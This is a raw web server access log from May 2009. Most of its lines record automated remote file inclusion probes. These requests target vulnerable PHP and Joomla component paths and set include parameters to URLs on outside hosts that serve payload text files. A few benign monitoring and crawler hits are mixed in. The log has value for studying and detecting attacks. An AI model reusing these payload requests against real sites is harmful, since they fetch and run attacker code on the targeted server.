80.237.146.58 - - [30/May/2009:05:40:51 -0400] "GET /logs/?sourcedir=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 200 3428 "-" "Mozilla/5.0"
80.237.146.58 - - [30/May/2009:05:40:51 -0400] "GET /?sourcedir=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:05:41:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.188.238.2 - - [30/May/2009:05:41:53 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:05:41:53 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:05:41:53 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.203.180.144 - - [30/May/2009:05:41:59 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:05:41:59 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:05:41:59 -0400] "GET //components/com_flyspray/startdown.php?file=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:05:42:00 -0400] "GET /logs/access_log.Q109051100//components/com_flyspray/startdown.php?file=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
72.188.238.2 - - [30/May/2009:05:42:12 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:43:40 -0400] "GET /logs/access_log.Q109050300/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
80.237.146.58 - - [30/May/2009:05:45:43 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:05:45:52 -0400] "GET /logs/index.php?configFile=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:05:45:52 -0400] "GET /index.php?configFile=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
80.237.146.58 - - [30/May/2009:05:45:52 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:05:45:58 -0400] "GET /logs/access_log.Q109021500%20%20/index.php?configFile=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:05:46:26 -0400] "GET /logs/access_log.Q109051600//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:05:46:26 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
77.221.159.43 - - [30/May/2009:05:46:29 -0400] "GET /logs/access_log.Q109050300/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.221.159.43 - - [30/May/2009:05:46:35 -0400] "GET /logs/access_log.Q109051000/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.249.67.16 - - [30/May/2009:05:46:36 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.16 - - [30/May/2009:05:46:36 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081BF40173177006F9D041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [30/May/2009:05:46:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.208.111.178 - - [30/May/2009:05:47:20 -0400] "GET /logs/access_log.Q109021500/index.php?configFile=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:05:47:45 -0400] "GET /index.php?configFile=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:05:47:45 -0400] "GET /logs/index.php?configFile=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:05:47:45 -0400] "GET /logs/access_log.Q109021500/index.php?configFile=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:05:47:54 -0400] "GET /index.php?configFile=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:05:47:54 -0400] "GET /logs/index.php?configFile=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:05:47:54 -0400] "GET /logs/access_log.Q109021500/index.php?configFile=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:05:48:09 -0400] "GET /logs/access_log.Q109021500%20%20/index.php?configFile=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:05:48:12 -0400] "GET /logs/access_log.Q109021500%20%20/index.php?configFile=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.228.45.60 - - [30/May/2009:05:48:28 -0400] "GET /logs/access_log.Q108062200/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
195.228.45.60 - - [30/May/2009:05:48:28 -0400] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
195.228.45.60 - - [30/May/2009:05:48:28 -0400] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:05:50:03 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:50:03 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:50:04 -0400] "GET /logs/access_log.Q109051600%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:50:07 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:50:07 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:50:09 -0400] "GET /logs/access_log.Q109051600%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:50:13 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:50:14 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:50:16 -0400] "GET /logs/access_log.Q109051600%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:05:51:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.32.195.2 - - [30/May/2009:05:52:11 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
84.32.195.2 - - [30/May/2009:05:52:12 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.103.72.130 - - [30/May/2009:05:52:29 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
83.103.72.130 - - [30/May/2009:05:52:29 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.103.72.130 - - [30/May/2009:05:53:19 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
83.103.72.130 - - [30/May/2009:05:53:19 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:53:51 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:53:51 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:53:51 -0400] "GET /logs/access_log.Q109050300//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:54:03 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:54:03 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:54:03 -0400] "GET /logs/access_log.Q109050300//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:05:54:17 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:05:54:17 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:05:54:17 -0400] "GET /logs/access_log.Q109050300//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:54:18 -0400] "GET /logs/access_log.Q108070500//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:54:27 -0400] "GET /logs/access_log.Q108070500//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:54:36 -0400] "GET /logs/access_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:54:37 -0400] "GET /logs/access_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:05:55:00 -0400] "GET /logs/access_log.Q108070500//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:05:55:35 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:05:55:43 -0400] "GET /logs/access_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
195.228.45.60 - - [30/May/2009:05:56:02 -0400] "GET /logs/error_log.Q108062200/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
209.59.12.99 - - [30/May/2009:05:56:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.162.28 - - [30/May/2009:05:57:39 -0400] "GET /logs/access_log.Q109052300/ncaster/admin/addons/archive/archive.php?adminfolder=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:58:14 -0400] "GET /logs/access_log.Q109052300/ncaster/admin/addons/archive/archive.php?adminfolder=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:58:15 -0400] "GET /logs/access_log.Q109051600/ncaster/admin/addons/archive/archive.php?adminfolder=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:06:01:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.97 - - [30/May/2009:06:02:22 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.38 - - [30/May/2009:06:03:29 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
85.119.154.129 - - [30/May/2009:06:05:20 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
85.119.154.129 - - [30/May/2009:06:05:20 -0400] "GET /?sourcedir=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
85.119.154.129 - - [30/May/2009:06:05:20 -0400] "GET /logs/?sourcedir=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 200 3428 "-" "libwww-perl/5.805"
72.188.238.2 - - [30/May/2009:06:05:58 -0400] "GET /logs/access_log.Q109050300%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:06:06:06 -0400] "GET /logs/access_log.Q108070500%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.237.82.158 - - [30/May/2009:06:06:18 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.kyouikusaikou.net/blog_student/include/redame.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.814"
85.119.154.129 - - [30/May/2009:06:06:35 -0400] "GET /logs/error_log.Q108090500/?sourcedir=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
209.59.12.99 - - [30/May/2009:06:06:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.98.212.6 - - [30/May/2009:06:07:06 -0400] "GET /logs/access_log.Q109051100//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:07:07 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:07:08 -0400] "GET /logs//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
85.119.154.129 - - [30/May/2009:06:08:09 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
85.119.154.129 - - [30/May/2009:06:08:09 -0400] "GET /?sourcedir=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
85.119.154.129 - - [30/May/2009:06:08:10 -0400] "GET /logs/?sourcedir=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 200 3428 "-" "libwww-perl/5.805"
85.119.154.129 - - [30/May/2009:06:09:10 -0400] "GET /logs/error_log.Q108090500/?sourcedir=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
72.18.148.82 - - [30/May/2009:06:11:05 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:11:05 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:11:06 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:11:11 -0400] "GET /logs/access_log.Q109052100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:06:11:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.237.82.158 - - [30/May/2009:06:11:42 -0400] "GET /logs/access_log.Q109051600//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.kyouikusaikou.net/blog_student/include/redame.txt?? HTTP/1.1" 404 300 "-" "libwww-perl/5.814"
69.237.82.158 - - [30/May/2009:06:11:42 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.kyouikusaikou.net/blog_student/include/redame.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.814"
72.18.148.82 - - [30/May/2009:06:12:24 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:12:24 -0400] "GET /logs/access_log.Q109052100%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:06:14:53 -0400] "GET /logs/access_log.Q109051100//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:14:54 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:14:55 -0400] "GET /logs//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:15:10 -0400] "GET /logs/access_log.Q109051100//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:15:11 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:15:12 -0400] "GET /logs//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
69.237.82.158 - - [30/May/2009:06:15:28 -0400] "GET /logs/error_log.Q109051600//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.kyouikusaikou.net/blog_student/include/redame.txt?? HTTP/1.1" 404 299 "-" "libwww-perl/5.814"
195.34.78.110 - - [30/May/2009:06:16:16 -0400] "GET /logs/access_log.Q109050300%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:06:16:17 -0400] "GET /logs/access_log.Q109050300%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:06:16:31 -0400] "GET /logs/access_log.Q109051100//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:16:32 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:16:32 -0400] "GET /logs//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
209.59.12.99 - - [30/May/2009:06:16:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [30/May/2009:06:16:47 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:16:47 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:06:17:00 -0400] "GET /logs/access_log.Q109051100//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:17:01 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:17:02 -0400] "GET /logs//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
209.142.149.230 - - [30/May/2009:06:18:01 -0400] "GET /logs/access_log.Q109010700//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
209.142.149.230 - - [30/May/2009:06:18:01 -0400] "GET //add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 206 "-" "libwww-perl/5.803"
209.142.149.230 - - [30/May/2009:06:18:01 -0400] "GET /logs//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.803"
118.98.212.6 - - [30/May/2009:06:19:09 -0400] "GET /logs/access_log.Q109051100//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:19:10 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:19:11 -0400] "GET /logs//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
203.194.204.129 - - [30/May/2009:06:19:18 -0400] "GET /index.php?str=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.194.204.129 - - [30/May/2009:06:19:18 -0400] "GET /logs/index.php?str=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:19:43 -0400] "GET /?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:19:43 -0400] "GET /logs/?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 200 3428 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:19:43 -0400] "GET /logs/error_log.Q109051300/?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:19:43 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:19:46 -0400] "GET /logs/?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 200 3428 "-" "Mozilla/5.0"
